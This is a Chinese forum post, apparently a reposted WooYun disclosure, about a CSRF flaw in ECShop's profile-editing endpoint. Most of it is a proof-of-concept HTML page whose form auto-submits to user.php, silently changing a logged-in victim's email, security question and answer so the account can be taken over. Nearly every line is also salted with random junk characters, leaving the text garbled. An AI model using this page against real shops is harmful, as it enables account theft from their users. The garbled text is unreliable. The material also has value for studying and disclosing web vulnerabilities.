简要描述:3 p; t7 _- `% [" C' X1 v
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现# c3 ]* x, U: e# ` }9 x, K
/ E P1 V0 h) s$ MDemo For:http://www.wooyun.org/bug.php?action=view&id=395
4 ]2 h2 A$ F" B( A4 ]) i' q5 D5 A
详细说明:" K' U5 k- o6 I
利用csrf和xss可以突破官方所说的“障碍”
+ M+ m/ k9 k1 f! i8 o7 Nxss版本已经有人说明
& H# i( ^+ o: s5 ?8 j2 Q$ u, x$ w这里给出csrf版本4 i* c2 G8 F( C0 X
T1 g$ ~8 d" D
漏洞证明:
0 y7 a( ?9 N- w( h3 \# y& W5 v<html>
. x* @/ r2 |4 ]$ X1 i& g" y<body>, N( L( c' t' G2 Z$ u- B0 K
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">) w4 Q; Y& e* g* r4 L
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">& @! d9 P" v' q3 l) q0 h
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
' d8 C+ F/ q- R8 [ T b& F m$ r<INPUT TYPE="text" NAME="sel_question" value="ecshop">4 ]6 J& s8 @2 n1 x
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
9 f+ \! J; e. S2 q6 z$ j& @- R) W</body>
5 D' A! ?, w# K% i D5 D( O- @<script>) i' X$ {# N+ x
document.forms[0].submit();
/ ]; ]" _+ I0 n- k( D, E</script>
% N* Y$ r6 `! W. \& L. `</html>
# s* d2 B) L+ o6 a+ T( h构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失( _1 R7 i5 F! g# C8 ?
; u4 D: `8 A5 z
|
发表于 2013-2-20 08:30:14
收藏
支持
反对